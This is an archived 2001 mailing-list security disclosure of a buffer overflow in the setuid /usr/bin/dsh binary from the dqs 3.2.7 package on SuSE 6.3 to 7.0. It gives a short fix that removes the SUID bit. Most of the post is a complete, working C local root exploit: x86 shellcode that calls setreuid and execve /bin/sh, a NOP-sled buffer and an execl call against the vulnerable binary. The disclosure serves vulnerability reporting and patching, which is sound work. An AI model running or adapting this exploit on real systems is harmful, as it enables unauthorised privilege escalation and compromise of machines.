
 
From: dex dex (dex@godsofthome.net)
Date: Fri May 18 2001 - 19:09:11 CDT



    Subject: dqs 3.2.7 local root exploit.

    Hello.

    DESCRIPTION:
    I found a buffer overflow vulnerability in
    /usr/bin/dsh (dqs 3.2.7
    package).

    I really don't know if this bug was discovered
    already. If that is the case,
    then sorry =).

    If a long string is given as the first argument, the
    program dies with a SIGSEGV
    signal.

    This bug was reported to Drake Diedrich, maintainer
    of dqs
    (Drake.Diedrich@anu.edu.adu).

    AFFECTED:
    SuSE 6.3, 6.4 and 7.0 ship dqs 3.2.7 by default
    and are therefore vulnerable;
    maybe others are too.

    FIX:
    Remove the SUID permission (the overflow only yields root while dsh runs setuid root):
    [root@netdex /root]# ls -la /usr/bin/dsh
    -rwsr-xr-x 1 root root 502748 May 18 00:36 /usr/bin/dsh
    [root@netdex /root]# chmod -s /usr/bin/dsh
    [root@netdex /root]# ls -la /usr/bin/dsh
    -rwxr-xr-x 1 root root 502748 May 18 00:36 /usr/bin/dsh
    [root@netdex /root]#

    EXAMPLE EXPLOIT:
    You can find the exploit at
    www.raza-mexicana.org/programas/programas/qsexp.c
    And here it is:

    ----CUT HERE----

    /* - dqsexp.c - */
    /********************************************************************/
    /* /usr/bin/dsh(dqs 3.2.7 package) local root
    exploit. */
    /* SuSE 6.3, 6.4, and 7.0 are
    vulnerable. */
    /* dexraza-mexicana.org <>
    http://www.raza-mexicana.org */
    /* Saludos: dr_fdisk^, yield, vlad, deadsector,
    trovalz, fatal, */
    /* megaflop y a todo raza. que weba escribirlos
    todos XD. */
    /* En especial saludos al espa~olete(NOP) :P, ya
    sabes porque. */
    /*
    */
    /* - dexraza-mexicana.org <>
    http://www.raza-mexicana.org - */
    /********************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define BUFFSIZE 2772
    #define OFFSET 0
    #define ALIGN 0

    unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
    }

    static char code[]= /* stolen
    from mount.c :P */

      "\x29\xc0" /* subl
    %eax, %eax */
      "\xb0\x46" /* movb
    $70, %al */
      "\x29\xdb" /* subl
    %ebx, %ebx */
      "\xb3\x0c" /* movb
    $12, %bl */
      "\x80\xeb\x0c" /* subb
    $12, %bl */
      "\x89\xd9" /* movl
    %ebx, %ecx */
      "\xcd\x80" /* int
    $0x80 */
      "\xeb\x18" /* jmp
    callz */
      "\x5e" /* popl
    %esi */
      "\x29\xc0" /* subl
    %eax, %eax */
      "\x88\x46\x07" /* movb
    %al, 0x07(%esi) */
      "\x89\x46\x0c" /* movl
    %eax, 0x0c(%esi) */
      "\x89\x76\x08" /* movl
    %esi, 0x08(%esi) */
      "\xb0\x0b" /* movb
    $0x0b, %al */
      "\x87\xf3" /* xchgl
    %esi, %ebx */
      "\x8d\x4b\x08" /* leal
    0x08(%ebx), %ecx */
      "\x8d\x53\x0c" /* leal
    0x0c(%ebx), %edx */
      "\xcd\x80" /* int
    $0x80 */
      "\xe8\xe3\xff\xff\xff" /* call
    start */
      "\x2f\x62\x69\x6e\x2f\x73\x68";


    void main(int argc, char **argv) {

    int i;
    unsigned long addr;

    char *buffer;

    int offset=OFFSET;
    int buffsize=BUFFSIZE;
    int align=ALIGN;

    if (argc > 1 ) offset = atoi(argv[1]);
    if (argc > 2 ) align = atoi(argv[2]);
    if (argc > 3 ) buffsize = atoi(argv[3]);

    buffer = (char *)malloc(buffsize + 8);

    addr = get_sp() - offset;
     
    for(i = 0; i < buffsize; i += 4) {
       *(long *)&buffer[i] = 0x90909090;
     }
     
     *(long *)&buffer[buffsize - 8] = addr;
     *(long *)&buffer[buffsize - 4] = addr;
     
     memcpy(buffer + buffsize - 8 - strlen(code) -
    align, code, strlen(code));
     

    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
     printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local
    root exploit.\n");
     printf("[*] - dexraza-mexicana.org <>
    http://www.raza-mexicana.org -
    \n");

    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
     
     printf("[*] Address=0x%x, Align=%d, Offset=%d\n",
    addr, align, offset);

    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
     printf("[*] Starting....\n");
     
     execl("/usr/bin/dsh", "dsh", buffer,
    "/etc/motd", NULL);
    }

    ----EOF----

    =================================================
    Mail: dex@raza-mexicana.org
    Page: http://www.raza-mexicana.org
    ===============================================